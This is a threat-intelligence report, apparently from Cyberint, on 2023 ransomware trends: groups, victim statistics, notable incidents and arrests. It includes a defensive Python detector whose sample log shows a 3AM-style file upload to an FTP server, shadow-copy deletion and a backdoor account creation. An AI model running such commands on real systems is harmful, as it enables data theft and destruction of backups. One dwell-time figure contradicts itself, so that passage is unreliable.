Ransomware Trends 2023 Report (2024)

2023 is considered the most successful year for ransomware groups in history.

In 2023, ransomware groups saw unprecedented success, with a 55.5% surge in victims, totaling 5,070, a stark rise from the previous year. Q2 and Q3 alone, with 2,903 victims, claimed more victims than the entire year 2022. The ransomware leaders remain the veterans: LockBit3.0, ALPHV and Cl0p.

Without a doubt, the MOVEit campaign will be remembered as the most successful campaign this year, teaching us the importance of supply chain attacks, of version control and of understanding our attack surface. The USA was the most targeted country (49.8%, up from 38% in 2022), followed by the U.K. and Canada. The most targeted sector was business services, with 1,265 cases, followed by retail and manufacturing.

See our 2024 trends report here.

Q4 2023 Ransomware Trends

In the fourth quarter of 2023, we documented 1,309 ransomware incidents globally. As illustrated in the graph below, the LockBit group continues to dominate ransomware group attacks, recording a total of 243 successful incidents. Following closely in second place is the PLAY group, which executed ransomware attacks on 110 different organizations. Notably, nearly 40% of their attacks were carried out in the fourth quarter alone.

It is worth mentioning that the CLOP gang did not make it to the top 10 list for the quarter despite being among the top 3 in the year’s overall totals. Since the notable MOVEit breach orchestrated by the CLOP gang, there has been no observed activity from the group. However, despite missing an entire quarter, Cl0p is the third most active group in 2023, which shows us the scale of the MOVEit campaign.

In the year 2022, a total of 2,809 ransomware attacks were recorded globally. In 2023, however, there was a significant surge, with the total number of ransomware attacks reaching 5,070, a substantial increase of more than 55%.

This significant shift is spearheaded by established cybercrime groups like LockBit and Clop, with additional momentum coming from emerging ransomware gangs such as 8Base, BianLian, Play, Akira, and others. The substantial increase can be largely attributed to the CLOP group, which executed attacks at a higher frequency compared to the previous year, rapidly securing a position among the top three ransomware groups by attack count.

Targeted Countries in 2023

When examining the Top 10 Countries most impacted by ransomware attacks, notable shifts are not apparent. The United States maintains its leading position, accounting for approximately 49.8% of all ransomware attacks. Following a pattern similar to the previous year, the United Kingdom, Canada, France, and Germany secured the next positions in the Top 5, with a considerable gap from the United States.

In a noteworthy change, India has unfortunately entered the top 10, displacing Russia from the previous year. Russia’s position last year could be attributed to the ongoing conflict between Russia and Ukraine, which garnered significant attention and involved ransomware groups from both sides, resulting in an escalation of attacks on the Russian front. With a relative de-escalation in cyber warfare activities between the two nations this year, India has taken Russia’s place in the top 10, experiencing increased ransomware attacks.

Top Ransomware Families in 2023

Top 3 Ransomware Families

LockBit

Emerging in September 2019, the LockBit ransomware group claimed the title of the most active ransomware group in 2022 following the shutdown of Conti. Throughout 2023, LockBit maintained its prominence as the most active ransomware group. This year, LockBit achieved successful attacks on approximately 1,047 victims, contributing to over 24% of the total ransomware attacks monitored by Cyberint in 2023.

ALPHV/BlackCat

On December 19, 2023, the FBI successfully dismantled one of the ALPHV/BlackCat ransomware sites. The main page now bears the customary FBI banner, while other sites linked to the cybercrime gang remain operational. Although the FBI’s action disrupted ALPHV, it is unlikely to completely halt the ransomware gang. Financially robust players like ALPHV can endure idle periods, and ransomware groups facing shutdown often resurface as entirely new entities or collaborate with existing groups. The comeback occurred swiftly when the group targeted two organizations at the end of December.

This year, ALPHV achieved successful attacks on approximately 445 victims, accounting for over 10% of the total ransomware attacks monitored by Cyberint in 2023.

Cl0p

Since February 2019, Clop attacks have been on the rise, persistently harming organizations worldwide in 2023. This year, Clop achieved successful attacks on approximately 384 victims, representing over 8% of the total ransomware attacks monitored by Cyberint in 2023.

Families Worth Noting in 2023

At the end of 2022, new ransomware families emerged, and older ones intensified their attacks in 2023. Notable among them were the 8Base and Play ransomware families.

8Base

Initiating operations in April 2022, 8Base is a ransomware collective that swiftly gained a reputation for its forceful strategies and a substantial volume of victims despite its relatively short time in the cyber landscape. In 2023, the group achieved significant milestones, conducting attacks on 281 organizations, with 40% of their focus on the United States.

Play

First observed around June 2022, the Play ransomware gang, responsible for devastating attacks on major American cities, allegedly launched more than 300 successful incidents since June 2022. In this year alone, the group executed 304 attacks, with more than 50% targeting organizations in the United States.

Newcomers in 2023

Rhysida

The Rhysida ransomware group came into the spotlight around May-June 2023 when they introduced a victim support chat portal accessible through the TOR (.onion) site. The group portrays itself as a “cybersecurity team,” claiming to be acting in its victims’ best interests by targeting their systems and drawing attention to the purported security vulnerabilities and their potential consequences.

The Rhysida ransomware group has gained notoriety due to a series of attacks on healthcare institutions, prompting government agencies and cybersecurity firms to intensify scrutiny of the group’s activities. In June, Rhysida first garnered attention when it publicly disclosed documents stolen from the Chilean Army (Ejército de Chile) on its data leak site.

In 2023, the Rhysida ransomware group made headlines with multiple significant attacks. They targeted high-profile entities, including the British Library, where they conducted a cyber-attack, causing a major technology outage and selling stolen personal information online. In the US, Rhysida attacked Prospect Medical Holdings, impacting the healthcare sector, and compromised Insomniac Games, a Sony-owned video game developer, showcasing their broad reach across diverse industries.

MalasLocker

MalasLocker emerged in March 2023 and adopted an unconventional approach by promising a charitable donation in exchange for providing decryption tools and preventing data leaks. This departure from typical ransom demands casts them as digital activists against corporate entities and economic inequality. Despite their claims, it’s unclear if they follow through on decryption after receiving proof of donations.

Focusing primarily on the Business Services, Software, and Manufacturing sectors, with a significant emphasis on Professional, Scientific, and Technical Services, MalasLocker targets companies mainly located in Italy, Russia, and the United States. Their attacks involve breaching Zimbra servers, encrypting data, and uploading suspicious JSP files to specific directories.

Akira

Akira is offered as a ransomware-as-a-service and was discovered in March 2023. Preliminary research suggests a connection between the Akira group and threat actors associated with the notorious ransomware operation Conti.

This ransomware, identified as having an impact on both Windows and Linux systems, operates by exfiltrating and encrypting data, coercing victims into paying a twofold ransom to regain access and restore their files.

The collective responsible for this ransomware has already directed its attention towards numerous victims, primarily focusing on those in the U.S. Furthermore, the group operates an active leak site for the Akira ransomware, where they publish information, including their latest data breaches.

BlackSuit

BlackSuit, a newly identified ransomware group resembling the notorious Royal ransomware, has posed a significant threat to the Healthcare and Public Health (HPH) sector since its emergence in May 2023. Exhibiting strong connections to Royal and the now-defunct Conti, known for aggressive targeting in this sector, BlackSuit’s affiliation raises concerns. While their victim count is limited, their attacks have impacted the United States, Canada, Brazil, and the United Kingdom across industries like healthcare, manufacturing, business technology, retail, and government.

Notably, a U.S.-based medical services provider to numerous hospitals faced severe disruptions, reflecting potential widespread consequences. Employing a double extortion method, BlackSuit encrypts sensitive data and demands ransoms, with detections in various sectors highlighting its evolving threat. Operating independently, BlackSuit’s distribution methods include infected email attachments, torrent websites, malicious ads, and Trojans.

3AM

3AM, a recently surfaced ransomware discovered in August 2023, has seen limited usage but showcased a noteworthy incident where it was employed as an alternative to LockBit after the latter was blocked. Coded in Rust, marking it as a distinct malware family, 3AM follows a distinct sequence, targeting services before encrypting files and attempting to delete Volume Shadow copies. The group behind 3AM publicly revealed leak sites, listing victims from the United States and Malaysia, a move that raises speculation about their intentions.

Notable Cyber Attacks & Campaigns in 2023

2023 provided us with some notable campaigns that, unfortunately, caused major damage to organizations worldwide. While MOVEit was the most devastating one, some other campaigns are worth mentioning.

MOVEit

The ongoing MOVEit campaign remains a prominent fixture in headlines, continually ensnaring new victims as it unfolds. This expansive campaign is a stark illustration of the potency of a supply chain attack, impacting many global companies. MOVEit, an instrumental managed file transfer (MFT) software employed widely across healthcare, finance, technology, and government sectors, touts its security through encryption and robust file transfer protocols for safe data exchange within and between teams and organizations.

However, within this seemingly secure software lie discovered vulnerabilities, exposing a path to remote code execution and potential data breaches. These loopholes have been exploited by the Cl0p ransomware group, tracing back to their exploitation of the MOVEit vulnerability since 2021, with evident attempts to extract data in 2022.

Cl0p, renowned for their adeptness at zero-day exploits such as the Accellion File Transfer Appliance (FTA) attacks in 2020 and 2021 and the targeting of GoAnywhere MFT servers in early 2023, has disclosed various compromised victims through the MOVEit flaw. Noteworthy companies like Norton, EY, and Zellis fell prey to this assault.

This extensive cyber incursion caused a ripple effect, impacting major entities to such an extent that the US government has offered a substantial reward for any information that links Cl0p’s actions to a foreign government.

Despite Cl0p’s claims of data deletion from specific sectors such as governments, the military, and children’s hospitals, their breach affected several US federal government agencies. The scale and repercussions of this attack continue to reverberate, with the Cl0p gang’s actions drawing widespread attention and scrutiny, signifying the severity and depth of the MOVEit ransomware breach.

Royal Ransomware Hits City of Dallas

The City of Dallas fell victim to a ransomware attack orchestrated by the Royal gang on May 3, triggering extensive network disruptions that compelled Dallas courts to remain shuttered until May 31. The Royal operators initially infiltrated the city’s network by pilfering service account credentials, maintaining a persistent presence for a month before deploying the ransomware. Restoration efforts commenced on May 9 and concluded by June 13.

In the wake of this disruptive attack, the Dallas City Council sanctioned an $8.5 million budget for mitigation and recovery endeavors. Expenditures encompassed external cybersecurity expertise, identity theft and fraud protection, and breach notification services.

The City of Dallas publicly acknowledged the ransomware intrusion in May, highlighted by the unusual printing of ransom notes from network printers, unequivocally attributed to the Royal ransomware group. In their blog post, the Royal ransomware gang threatened to expose sensitive information, encompassing employee details, court cases, prisoner data, medical records, client information, and governmental documents.

The ramifications were far-reaching, affecting various city services and departments, including the Dallas police department, 311 customer service app, courts, water utilities, code compliance services, animal services, secretary’s office, and development services. Subsequent reports from the Attorney General’s office in August indicated that 26,212 individuals bore the brunt of the breach, exposing personal details such as names, addresses, social security numbers, and medical and health insurance information. Further investigation pushed the tally of affected individuals to 30,253, amplifying the gravity and scope of the breach.

Las Vegas Hotel Giants Hit by Scattered Spider

In September 2023, two major hotel and casino giants in Las Vegas, MGM Resorts International and Caesars Entertainment, fell victim to ransomware attacks. MGM Resorts encountered a “cybersecurity issue” that led to the shutdown of U.S. systems, impacting numerous MGM hotels and disrupting vital services like the company’s website, app, reservations, ATMs, slot and credit card machines.

While sensitive financial data remained secure, personal information, including names, contact details, driver’s license and Social Security numbers, and passport details of pre-March 2019 customers, was compromised, with a projected cost of around US$100 million. In contrast, Caesars Entertainment saw limited service disruption but suffered data theft from its loyalty program database, affecting 41,397 Maine residents.

The Scattered Spider ransomware group claimed responsibility, absconding with 6 terabytes of data. MGM declined to pay the ransom and worked on recovery, while reports indicated that Caesars paid US$15 million of the demanded US$30 million ransom for data protection.

BlackCat Ransomware Hits Western Digital

In March, Western Digital encountered a ransomware attack linked to the ALPHV/BlackCat ransomware group, which they disclosed on April 3. Responding swiftly, they activated their protocols, restoring affected services and engaging law enforcement. The aftermath involved data theft and service disruptions affecting platforms like SanDisk and My Cloud, impacting customer access.

BlackCat, a notable ransomware group in 2023, claimed responsibility for leaking alleged stolen data publicly on April 28, employing aggressive tactics such as sharing purported footage from a Western Digital video conference. Western Digital acknowledged the leaked data on May 5 and confirmed an ongoing investigation into these claims.

LockBit Attacks Royal Mail

In early 2023, Royal Mail experienced a significant ransomware attack orchestrated by the LockBit group. The attack, involving LockBit’s encryptors, severely disrupted Royal Mail’s international shipping capabilities for approximately six weeks. LockBit initially demanded a ransom of £65.7 million ($79.85 million) for the return of stolen data.

Royal Mail, however, chose not to comply with these ransom demands, which were considered “absurd” by its directors. In response, LockBit published 44 gigabytes of Royal Mail’s stolen data on the dark web in an attempt to extort money. Despite this pressure, Royal Mail maintained its stance against paying the ransom. The financial impact on Royal Mail was significant, with substantial costs incurred for recovery from the attack.

Meanwhile, LockBit continued its extortion attempts, reducing the ransom demand to £33 million, a decrease from the original £65 million. Royal Mail did not change its position, and its refusal to comply is what led LockBit to publish the stolen data on the dark web.

2023 Summary

2023 set a new all-time high for the ransomware industry. With established families such as LockBit, ALPHV and Cl0p, this industry caused severe damage to organizations worldwide. In addition, this year’s newcomers introduced capable tooling and services that helped them become permanent threats as well.

Although law enforcement authorities worldwide are still doing their best to stop this menace from continuing to evolve, the industry is still growing rapidly.

Read on for a detailed breakdown, quarter by quarter ↓

Q3 2023 Ransomware Trends Summary

Q3 will be remembered as a new record for the ransomware industry as it was the most successful quarter ever recorded.

While the number skyrocketed in Q2 with 1,386 cases, in Q3 the ransomware industry was able to surpass this number with 1,420 cases.

With no surprise, the U.S. continues to be the most targeted country by ransomware, while the business services sector is the most targeted sector.

There is no doubt that the new faces that were introduced to the industry, along with the MOVEit campaign, were able to claim many victims. This, combined with the consistency of industry leader LockBit3.0, meant devastating results for companies worldwide.

Statistics

As mentioned, the ransomware industry claimed 1,420 victims this quarter, the highest number of victims ever recorded in one quarter.

Top Ransomware Families in Q3 2023

While it was a successful quarter for the entire ransomware industry, three families were far ahead of the pack. As expected, LockBit3.0 remains the most dominant ransomware group with 252 new victims, 17.7% of all ransomware cases.

Coming second is Cl0p Ransomware, which was able to claim a significant number of victims − 177. An important note here is that although Cl0p claimed 177 victims, this was only in two out of the three months of the quarter, as they haven’t announced any victims for September.

Number three is the veteran group ALPHV with 120 victims this quarter.

Top Countries Targeted By Ransomware in Q3 2023

Regarding the most targeted countries (Figure 2), the U.S. remains the number one targeted country in the world, with good reason. The world’s leading economy, it was the victim of 51% of this quarter’s ransomware attacks − 575 cases.

The second most targeted country this quarter is the United Kingdom, with 77 cases, far behind the U.S. Finally, we have Canada in third place with 48 ransomware cases this quarter. Even when focusing on the top three countries, we can see that there is no doubt that the U.S. is the most attractive country to threat actors.

Top Sectors Targeted By Ransomware in Q3 2023

As expected, the business services sector was the most targeted sector in Q3, with 42% of the ransomware cases, followed by the manufacturing and the retail sectors, with 19% and 12%, respectively (Figure 3).

Newcomers to the Ransomware Industry in Q3 2023

RHYSIDA RANSOMWARE GROUP

The Rhysida ransomware group came into the spotlight around May-June 2023 when they introduced a victim support chat portal accessible through the TOR (.onion) site. The group portrays itself as a “cybersecurity team,” claiming to be acting in its victims’ best interests by targeting their systems and drawing attention to the purported security vulnerabilities and their potential consequences.

The Rhysida ransomware group has gained notoriety due to a series of attacks on healthcare institutions, prompting government agencies and cybersecurity firms to intensify their scrutiny of the group’s activities. Earlier in June, Rhysida first garnered attention when it publicly disclosed documents stolen from the Chilean Army (Ejército de Chile) on its data leak site.

Victimology of the Rhysida Ransomware Group

Rhysida ransomware mostly targets the U.S., with 31% of its victims. In addition, it also ran successful campaigns in the UK, Italy and France. As for the target sectors, it seems that Rhysida had the most success in the business services sector, which comprises 51% of their campaigns.

3AM: NEW RANSOMWARE FAMILY

A newly discovered ransomware strain named 3AM has emerged, but its usage has been limited thus far. One interesting attack that was discovered was when a ransomware affiliate tried to deploy LockBit on a target’s network but switched to 3AM when LockBit was blocked.

3AM is coded in Rust and appears to be an entirely new malware family. It follows a specific sequence: It attempts to halt multiple services on the compromised computer before initiating the file encryption process. After completing encryption, it tries to erase Volume Shadow (VSS) copies. Any potential links between its authors and known cybercrime organizations remain unclear.

The threat actor’s suspicious activities began with the utilization of the gpresult command to extract policy settings enforced on the computer for a specific user. They then executed various components of Cobalt Strike and made efforts to elevate privileges on the computer using PsExec.

Then the attackers conducted reconnaissance through commands such as whoami, netstat, quser, and net share. They also attempted to identify other servers for lateral movement using the quser and net view commands. In addition, they established a new user account to maintain persistence and employed the Wput tool to transfer the victims’ files to their FTP server.
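The chain described above (gpresult, a reconnaissance burst of whoami, netstat, quser, net share and net view, a new account for persistence, Wput to an FTP server, and the Volume Shadow copy deletion mentioned earlier) is exactly the kind of sequence a defender can spot in process-creation telemetry. The following is an added detection example, not code from the report or from any vendor: it runs simple rules over a constructed sample of process-creation events. The log format, the ten-minute window, the threshold of four distinct reconnaissance commands, and the specific command-line shapes for account creation (`net user ... /add`) and shadow copy deletion (`vssadmin delete shadows`) are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation events, one per line:
#   timestamp|host|user|command line
# The first host shows a 3AM-style sequence; the second shows benign,
# widely spaced admin activity that must not trigger the burst rule.
SAMPLE_LOG = """\
2023-09-01T02:55:10|WS01|corp\\jdoe|gpresult /z
2023-09-01T02:57:42|WS01|corp\\jdoe|whoami /all
2023-09-01T02:58:03|WS01|corp\\jdoe|netstat -ano
2023-09-01T02:58:30|WS01|corp\\jdoe|quser
2023-09-01T02:59:01|WS01|corp\\jdoe|net share
2023-09-01T02:59:20|WS01|corp\\jdoe|net view /domain
2023-09-01T03:04:15|WS01|corp\\jdoe|net user svc_backup P@ss /add
2023-09-01T03:10:00|WS01|corp\\jdoe|wput.exe C:\\share\\finance\\ ftp://203.0.113.5/up/
2023-09-01T03:20:05|WS01|SYSTEM|vssadmin delete shadows /all /quiet
2023-09-01T09:15:00|WS02|corp\\asmith|whoami
2023-09-01T14:02:00|WS02|corp\\asmith|net view \\\\fileserver
"""

RECON_BINARIES = {"whoami", "netstat", "quser", "gpresult"}
RECON_NET_SUBCOMMANDS = {"share", "view"}
RECON_WINDOW = timedelta(minutes=10)   # assumption: tune to your environment
RECON_THRESHOLD = 4                    # distinct recon commands, one user on one host


def parse_log(text):
    """Parse the pipe-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("|", 3)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "user": user, "cmd": cmd})
    return events


def _tokens(cmd):
    """Split a command line; normalise the first token to a bare lowercase binary name."""
    parts = cmd.split()
    if not parts:
        return []
    exe = re.sub(r"\.exe$", "", parts[0].rsplit("\\", 1)[-1].lower())
    return [exe] + [p.lower() for p in parts[1:]]


def classify(cmd):
    """Return (category, key) for a command line, or None if it is uninteresting."""
    t = _tokens(cmd)
    if not t:
        return None
    if t[0] in RECON_BINARIES:
        return ("recon", t[0])
    if t[0] == "net" and len(t) > 1:
        if t[1] in RECON_NET_SUBCOMMANDS:
            return ("recon", "net " + t[1])
        if t[1] == "user" and "/add" in t:          # persistence via a new local account
            return ("account_creation", cmd)
    if t[0] == "wput":                                # FTP upload tool seen in the 3AM case
        return ("ftp_upload_tool", cmd)
    if t[0] == "vssadmin" and "delete" in t and "shadows" in t:
        return ("shadow_copy_deletion", cmd)
    return None


def detect(events):
    """Apply the rules; return alerts sorted by time, one recon_burst per host/user."""
    alerts = []
    recon = defaultdict(list)  # (host, user) -> [(ts, recon key)]
    for e in sorted(events, key=lambda e: e["ts"]):
        c = classify(e["cmd"])
        if c is None:
            continue
        category, key = c
        if category == "recon":
            recon[(e["host"], e["user"])].append((e["ts"], key))
        else:
            alerts.append({"rule": category, "host": e["host"], "user": e["user"],
                           "ts": e["ts"], "evidence": key})
    for (host, user), items in recon.items():
        for i, (start, _) in enumerate(items):
            # distinct recon commands starting at this event and inside the window
            seen = {k for ts, k in items[i:] if ts - start <= RECON_WINDOW}
            if len(seen) >= RECON_THRESHOLD:
                alerts.append({"rule": "recon_burst", "host": host, "user": user,
                               "ts": start, "evidence": sorted(seen)})
                break
    return sorted(alerts, key=lambda a: a["ts"])


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(a["ts"].isoformat(), a["host"], a["user"], a["rule"], a["evidence"])
```

Run against the sample, WS01 produces four alerts (the reconnaissance burst, the account creation, the Wput invocation and the shadow copy deletion) while WS02's two commands, hours apart, produce none. In a real deployment the same rules would read Sysmon event ID 1 or Windows 4688 records, and the burst rule is the one worth tuning most, since a single `whoami` is noise but five distinct enumeration commands in a few minutes from one account is rarely an administrator's routine.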

On September 14, the 3AM (ThreeAM) Ransomware group made their leak sites public and included six organizations on their list of victims. These organizations consisted of five from the United States and one from Malaysia. It remains uncertain whether this development was an intentional publicity move or merely a coincidental occurrence for this group, which had only recently come to the researchers’ attention.

Arrests

US AND UK MOUNT AGGRESSIVE CRACKDOWN ON TRICKBOT AND CONTI GANGS

On September 7, the United States Department of Treasury and the United Kingdom Foreign Office jointly declared sanctions against 11 individuals, accusing them of being linked to the Trickbot cybercriminal group. Additionally, the US Department of Justice revealed indictments against nine individuals said to have ties to Trickbot and its affiliated entity, Conti. Notably, seven of the individuals named in the sanctions were also included in the list of those facing indictments.

The Department of Justice has unveiled three indictments, and among those charged is Galochkin. One of these indictments, filed on June 15 in the Northern District of Ohio, accuses him and ten other purported Trickbot members of conspiring to use the Trickbot malware for personal gain and to take personal and confidential data from unsuspecting victims. These victims include businesses and financial institutions both within the United States and across the globe, with the illicit activity commencing in November 2015.

In an indictment filed in the Middle District of Tennessee, on June 12, Galochkin and three additional individuals were charged with using Conti ransomware. These charges stem from attacks aimed at “businesses, nonprofits, and governments in the United States” spanning from 2020 to June 2022.

Furthermore, an indictment filed in the Southern District of California on June 14 implicates Galochkin in connection with the Conti ransomware attack on Scripps Health that occurred on May 1, 2021.

IT WORKER JAILED FOR IMPERSONATING RANSOMWARE GANG TO EXTORT EMPLOYER

Ashley Liles, a 28-year-old former IT employee, has received a prison sentence of more than three years for his involvement in an extortion attempt against his employer during a ransomware attack.

Liles, who previously worked as an IT security analyst at a company based in Oxford, abused his position to intervene in a ransomware payment following an attack on his employer.

In an attempt to deceive the company, he posed as the ransomware group that was extorting them. His scheme involved trying to divert the ransom payments by changing the cybercriminals’ cryptocurrency wallet to one that he controlled.

He accessed the private emails of a board member on more than 300 occasions and also tampered with the original blackmail email, changing the payment destination specified by the initial attacker. Furthermore, he established an email address that closely resembled the one used by the attackers and used it to exert additional pressure on his employer, with the aim of ensuring that the ransomware gang’s demands would be met, and the ransom paid.

However, the company did not comply with the demands of the attackers. During this time, internal investigations revealed that Liles had been accessing confidential emails without authorization while using his home internet connection.

Although Liles took measures to erase all data from his personal devices once he became aware of the ongoing investigations, the cybercrime team from SEROCU seized his computer and successfully recovered damning evidence.

Initially, Liles vehemently denied any involvement, but during a recent court hearing at Reading Crown Court, he pleaded guilty, five years after the events in question.

As a result, Liles was sentenced to three years and seven months in prison for charges related to blackmail and unauthorized computer access with the intent to commit other offenses.

New Ransomware Trends in Q3 2023

LINUX VERSION OF ABYSS LOCKER RANSOMWARE TARGETS VMWARE ESXI SERVERS

Abyss Locker is a ransomware group that emerged relatively recently. Its activities are believed to have commenced in March 2023. Their modus operandi resembles that of other ransomware operations, involving the infiltration of corporate networks, data exfiltration for double extortion purposes, and the encryption of devices within the network.

The Abyss Locker campaign is the most recent example of the trend where ransomware operators have developed a Linux encryptor designed specifically to target VMware’s ESXi virtual machine platform in their attacks on businesses.

As organizations increasingly adopt virtual machines to enhance resource management, performance, and disaster recovery, ransomware groups have adapted by creating encryptors tailored to these platforms.

Given that VMware ESXi is among the most widely used virtual machine platforms, nearly every ransomware gang has started releasing Linux encryptors with the capability to encrypt all virtual servers hosted on these devices.

RANSOMWARE HACKERS’ DWELL TIME DROPS TO 5 DAYS, RDP STILL WIDELY USED

Ransomware threat actors are now spending less time operating within compromised networks before security solutions detect their presence. During the first half of this year, the median dwell time for hackers decreased from nine days in 2022 to just five days.

Upon cross-referencing our ransomware family statistics, encompassing all attacks monitored by Cyberint, with data provided by cybersecurity company Sophos, a noteworthy trend emerged. The median dwell time for cyberattacks, encompassing the entire spectrum of incidents, exhibited a decline from ten days in 2022 to a reduced eight-day timeframe during the first half of this year. Furthermore, it became evident that ransomware attacks accounted for approximately 70% of the total cyberattacks reported during this period.

From our findings and Sophos’ as well, we can say that while ransomware attackers act swiftly, with a median dwell time reduction from 11 to 13 days this year, other cybercriminals conducting network intrusions tend to prolong their presence, waiting for the right moment.

Across all cases, the average dwell time hovers at 15-16 days, with the longest observed dwell time this year exceeding three months. Interestingly, data theft is becoming less common, as there were fewer such attacks, dropping to 31.58% in H1 2023 from 42.76% in 2022. This trend is supported by an uptick in incidents where it was confirmed that no data was exfiltrated, rising from 1.32% to 9.21%.

Our data reveals intriguing trends when examining the timing of cyberattacks. Based on these statistics, threat actors, including ransomware groups, tend to target organizations more frequently on Tuesdays, Wednesdays, and Thursdays.

Major Ransomware Attacks & Incidents in Q3 2023

MOM’S MEALS DISCLOSES DATA BREACH IMPACTING 1.2 MILLION PEOPLE

PurFoods, operating under the name Mom’s Meals, reported a data breach to the Maine Attorney General’s Office. The breach involved the unauthorized access of sensitive information, including personal identifiers such as names, financial account numbers, payment card (credit or debit) details, security codes, and account passwords or PINs.

The company first detected “suspicious account behavior” on February 22, 2023. Subsequent investigation revealed that PurFoods had experienced a cyberattack between January 16, 2023, and February 22, 2023. During that attack, certain files on their network were encrypted. Although it couldn’t be definitively determined if data was extracted from their servers, the possibility couldn’t be ruled out.

PurFoods engaged third-party experts to conduct a review of the potentially compromised data, which concluded on July 10, 2023. This review revealed that the files in question contained personal and protected health information of specific individuals. The potentially exposed information included names, Social Security numbers, driver’s license or state identification numbers, financial account and payment card information, medical and health data, as well as birthdates.

The company initiated the notification process for affected individuals on August 25. According to official records, approximately 1,237,681 people may have been impacted by this security incident.

SRI LANKAN GOVERNMENT LOSES MONTHS OF DATA FOLLOWING RANSOMWARE ATTACK

In a recent cybersecurity incident, the Sri Lankan government suffered a significant data loss as a result of a ransomware attack. The attack targeted Sri Lanka’s government email network, impacting thousands of email accounts, including those belonging to high-ranking government officials. The attack, which commenced at the end of August, affected nearly 5,000 email addresses utilizing the gov[.]lk email domain, with the council of ministers, a central government body, among the victims.

The targeted system, known as the Lanka Government Cloud (LGC), was subjected to encryption, along with its backups. While officials managed to restore the LGC system within 12 hours of the attack, they were unable to recover backups from the period between May 17 and August 26. Consequently, all affected accounts lost data for that duration, as stated by Mahesh Perera, the head of Sri Lanka’s Information and Communication Technology Agency (ICTA).

In response to the incident, Sri Lanka’s computer emergency response team (CERT|CC) launched an investigation and is actively working on data recovery efforts. Perera has emphasized that the government has no intention of negotiating with the attackers or paying a ransom to retrieve the lost data.

The identity of the hacking group responsible for the attack remains unknown. It is suspected that the attackers may have gained initial access to the targeted system by distributing malicious links to government employees, and that they likely exploited a vulnerability in an outdated, unpatched version of Microsoft Exchange.

Notably, the Sri Lankan government has previously faced criticism for its lack of cybersecurity focus. The country lacked a dedicated cybersecurity authority until June 2023 when cybersecurity legislation was introduced.

CLOP GANG TO EARN OVER $75 MILLION FROM MOVEIT EXTORTION ATTACKS

Starting on May 27, the Clop ransomware group initiated extensive data theft attacks by exploiting a previously unknown vulnerability in the MOVEit Transfer secure file transfer platform.

These attacks are anticipated to have repercussions for numerous companies across the globe, with many of them having already informed their affected clientele over the course of the last two months. In addition, Clop has altered its approach to extortion by requesting considerably larger ransom payments than those typically observed in data exfiltration attacks. Their aim is to offset the overall decrease in payments by securing a few substantial sums.

Based on insights from various researchers, it’s anticipated that only a limited number of MOVEit data theft victims will opt to make payments. Despite this, Clop is still projected to accumulate a substantial sum, estimated to be in the range of $75-100 million, primarily due to the substantial ransom requests they’ve made.

The Ransomware Industry in 2023

The ransomware industry remains the number one threat to organizations worldwide. This quarter had the most recorded victims to date, and supply chain attacks became an established technique for the mature and experienced ransomware groups.

In addition, this quarter revealed new ambitious groups that are looking to make their mark on the ransomware industry. LockBit3.0 remains the ruler of the industry, although Cl0p was not far behind this quarter.

Although we have seen increased activity by law enforcement authorities worldwide this quarter, the industry keeps on thriving despite these efforts.

With Cyberint’s Attack Surface Management, you gain visibility of your true attack surface – the digital assets you are aware of, the assets you are unaware of, and malicious or rogue assets. Learn more about how we prevent ransomware attacks with a 1:1 meeting.
